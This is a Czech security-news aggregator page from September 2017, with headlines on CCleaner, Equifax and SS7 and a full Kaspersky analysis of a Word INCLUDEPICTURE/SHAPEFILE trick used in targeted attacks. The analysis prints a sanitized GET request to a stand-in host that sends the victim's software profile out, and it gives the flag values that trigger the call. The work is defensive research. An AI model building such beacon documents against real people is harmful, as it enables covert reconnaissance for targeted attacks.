Viry a Červi

Přes 2 miliony uživatelů používalo kompromitovaný CCleaner!

VIRY.CZ - 19 Září, 2017 - 09:12

Pokud používáte aplikaci CCleaner na „úklid“ pevného disku a náhle Vám ji antivirus označil za havěť, pak s velkou pravděpodobností nejde o falešný poplach!

Společnost Piriform Ltd., výrobce oblíbeného nástroje CCleaner, se totiž stala cílem útoku a nástroj CCleaner se stal hostitelem pro backdoor, tedy havěť, která dokáže od uživatelů vykrádat data. Postiženou verzi si nevědomky stáhlo kolem 2,7 milionů uživatelů (včetně mě). Pokud se o tom uživatel nedozví někde z médií, tak pravděpodobně při dalším spuštění CCleaneru, kdy je velká pravděpodobnost, že se ozve antivirus a ccleaner.exe nekompromisně zlikviduje jako každou jinou havěť (takhle antiviry reagují dle virustotal.com). Taktéž můj případ

Kategorie: Viry a Červi

Pirate Bay digs itself a new hole: Mining alt-coin in slurper browsers

The Register - Anti-Virus - 19 Září, 2017 - 08:02
Would you trade your CPU time and electricity bill for pirated content?

Bittorrent search engine and mortal enemy of intellectual property lawyers, The Pirate Bay, has upset the one group of people that actually likes it: its users.…

Kategorie: Viry a Červi

Sexploitation gang thrown in clink for 171 years after 'hunting' kids online and luring them in front of webcams

The Register - Anti-Virus - 19 Září, 2017 - 02:16
Youngsters tricked into performing sex acts for pervs

Four men have joined their two accomplices behind bars for tricking young girls into performing sex acts online so they could film them.…

Kategorie: Viry a Červi

Someone checked and, yup, you can still hijack Gmail, Bitcoin wallets etc via dirty SS7 tricks

The Register - Anti-Virus - 19 Září, 2017 - 01:37
Two-factor authentication by SMS? More like SOS

Once again, it's been demonstrated that vulnerabilities in cellphone networks can be exploited to intercept one-time two-factor authentication tokens in text messages.…

Kategorie: Viry a Červi

Attackers Use Undocumented MS Office Feature to Leak System Profile Data

VirusList.com - 18 Září, 2017 - 22:33
An undocumented Microsoft Office feature allows for spying via specially crafted Word documents—no macros, exploits or any other active content needed.
Kategorie: Viry a Červi

DRM now a formal Web recommendation after protest vote fails

The Register - Anti-Virus - 18 Září, 2017 - 20:51
W3C lays out the case for anti-piracy, anti-copying defenses

Anti-piracy and anti-copying protections are now formally part of the World Wide Web after an effort to vote down content controls at the WWW's standards body failed.…

Kategorie: Viry a Červi

DOJ lets itself off the privacy hook

Sophos Naked Security - 18 Září, 2017 - 20:40
The Department of Justice has excused its insider threat database from multiple provisions of the 1974 Privacy Act

Pirate Bay Spotted Hosting Monero Cryptocurrency Miner

VirusList.com - 18 Září, 2017 - 20:19
A cryptocurrency miner surfaced on The Pirate Bay for a day over the weekend.
Kategorie: Viry a Červi

Chrome to brand FTP as “not secure”

Sophos Naked Security - 18 Září, 2017 - 19:13
With the release of Chrome 63 in December 2017 FTP will be branded "not secure"

Downloaded CCleaner lately? Oo, awks... it was stuffed with malware

The Register - Anti-Virus - 18 Září, 2017 - 15:46
OK, OK, well the 2.27 million victims were not Reg readers

Antivirus firm Avast has admitted inadvertently distributing a trojanised version of CCleaner, a popular PC tune-up tool, for nearly a month, infecting an estimated 2.27 million users.…

Kategorie: Viry a Červi

TfL hackathon showed data can keep transport running and people safe

The Register - Anti-Virus - 18 Září, 2017 - 15:19
Analytics is about the journey AND destination

Sponsored  If software is eating the world, then hackathons are its fast-food restaurants. Groups of developers come together for short periods to try to solve pressing problems. This happens in sectors from healthcare to retail, and now it's happening in transportation too.…

Kategorie: Viry a Červi

Malicious CCleaner update points to a major weakness in our infrastructure

Virus Bulletin News - 18 Září, 2017 - 12:14
Researchers from Cisco Talos have found that a recent version of the widely used CCleaner tool installed malware on the machine.

Read more
Kategorie: Viry a Červi

An (un)documented Word feature abused by attackers

Kaspersky Securelist - 18 Září, 2017 - 11:00

A little while back we were investigating the malicious activities of the Freakyshelly targeted attack and came across spear phishing emails that had some interesting documents attached to them. They were in OLE2 format and contained no macros, exploits or any other active content. However, a close inspection revealed that they contained several links to PHP scripts located on third-party web resources. When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers received information about the software installed on the computer.

What did the bad guys want with that information? Well, to ensure a targeted attack is successful, intelligence first needs to be gathered, i.e. the bad guys need to find ways to reach prospective victims and collect information about them. In particular, they need to know the operating system version and the version of some applications on the victim computer, so they can send it the appropriate exploit.

In this specific case, the document looked like this:

There’s nothing suspicious about it at first glance – just a few tips about how to use Google search more effectively. The document contains no active content, no VBA macros, embedded Flash objects or PE files. However, when the user opens the document, Word sends the following GET request to one of the internal links. So we opened the original document used in the attack, replaced the suspicious links with http://evil-*, and obtained the following:

GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed. We decided to examine why Office followed that link, and how these links can be identified in documents.

Inside a Word document

The first thing about the document that caught our eye was the INCLUDEPICTURE field containing one of the suspicious links. However, as can be seen, that is not the link that Word addresses.

As a matter of fact, the data chunk seen in the fragment above contains the first and only piece of text in this document. The text in Word documents resides in the WordDocument stream in a ‘raw state’, i.e. it contains no formatting except so-called fields. The fields tell Word that a certain segment of the text must be presented in a specific way; for example, it is thanks to these fields that we can see active links to other pages of the document, URL links, etc. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text. The 0x13 byte (marked in red) in front of this field indicates that the ‘raw’ text ends there and a field description begins. The description format is roughly as follows (according to [MS-DOC]: Word (.doc) Binary File Format):

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

The separator byte 0x14 is marked in yellow, and the field end byte 0x15 is shown inside the pink box.

The link to the image in the INCLUDEPICTURE field should be in ASCII format, but in this case it is in Unicode, so Word ignores the link. However, the separator byte 0x14 is followed by the byte 0x01 (shown in the green box) which indicates to the word processor that an image should be inserted at this point. The question is: how do we find this image?

The characters and groups of characters within the text also possess properties; just like fields, these properties are responsible for formatting (for example, they specify that a certain piece of text must be rendered in italics). The properties of characters are stored in a two-level table within document streams under the names ‘xTable’ and ‘Data’. We will not go into the complex details of how to analyze character properties, but as a result of this analysis we can find the character properties from the offset 0x929 to 0x92C in the WordDocument stream:

This is the byte sequence with the picture placeholder 0x14 0x01 0x15. In the actual document, these bytes are located at offsets 0xB29 – 0xB2C, but the WordDocument stream begins with offset 0x200, and the character offsets are specified relative to its beginning.

The properties of the group of characters CP[2] indicate that an image is attached to them that is located in the Data stream at offset 0:

1FEF: prop[0]: 6A03 CPicLocation
1FF1: value[0]: 00000000 ; character = 14

We arrive at this conclusion based on the fact that byte 0x01 is indicated in the INCLUDEPICTURE field’s value – this means the image should be located in the Data stream at the appropriate offset. If this value were different, then it would have been necessary to look for the image in a different place or ignore this property.

This is where we stumbled on an undocumented feature. Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field. This is all there is:

0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section 2.16.5.33.

Standard ECMA-376 describes only that part of INCLUDEPICTURE that precedes the separator byte. It has no description of what the data that follows it may mean, and how it should be interpreted. This was the main problem in understanding what was actually happening.

So, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:

Forms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This form has a name and, in this case, it is another suspicious link:

However, this is just an object name, so this link is not used in any way. While investigating this form further, let’s look at the flags field (in the red box):

The value 0x0000000E resolves into a combination of three flags:

  • msoblipflagURL 0x00000002
  • msoblipflagDoNotSave 0x00000004
  • msoblipflagLinkToFile 0x00000008

This indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot), and that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag, which prevents this content from being saved to the actual document when it is opened.

If we look at what this URL is, we see that it’s the actual link that Word follows when the document is opened:

We should note that besides Word for Windows, this ‘feature’ is also present in Microsoft Office for iOS and in Microsoft Office for Android; LibreOffice and OpenOffice do not have it. If this document is opened in LibreOffice or OpenOffice, the malicious link is not called.

This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks.

Kaspersky Lab’s security products are able to detect when the technique described in this article is used in Microsoft Word documents, and to find links embedded in a document using the same technique.

Monday review – the hot 24 stories of the week

Sophos Naked Security - 18 Září, 2017 - 10:04
From Equifax's feeble PINs putting frozen credit files at risk and 4 steps to secure yourself to the latest updates on the breach, and more

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down

The Register - Anti-Virus - 18 Září, 2017 - 00:35
Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.…

Kategorie: Viry a Červi

Vevo hacked, 3.12 TB of data leaked

Sophos Naked Security - 17 Září, 2017 - 20:01
The hacking group OurMine says it leaked the data after being told "f*ck off, you don't have anything"

Rogue WordPress Plugin Allowed Spam Injection

VirusList.com - 15 Září, 2017 - 21:54
A rogue version of the WordPress plugin called “Display Widget” allowed third-parties to injecting spam advertising content into victims’ sites.
Kategorie: Viry a Červi

Equifax UK admits: 400,000 Brits caught up in mega-breach

The Register - Anti-Virus - 15 Září, 2017 - 21:39
UK dedicated systems not affected

Equifax UK has surfaced to say that British systems were not affected by a recently disclosed megahack, however 400,000 UK people were affected due to a “process failure.”…

Kategorie: Viry a Červi

Equifax mega-breach: Security bod flags header config conflict

The Register - Anti-Virus - 15 Září, 2017 - 20:05
Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.…

Kategorie: Viry a Červi

VMware Patches Bug That Allows Guest to Execute Code on Host

VirusList.com - 15 Září, 2017 - 17:51
Users who run four different types of VMware products, ESXi, vCenter Server, Fusion and Workstation, are being encouraged to update to address a series of vulnerabilities, one critical.
Kategorie: Viry a Červi
Syndikovat obsah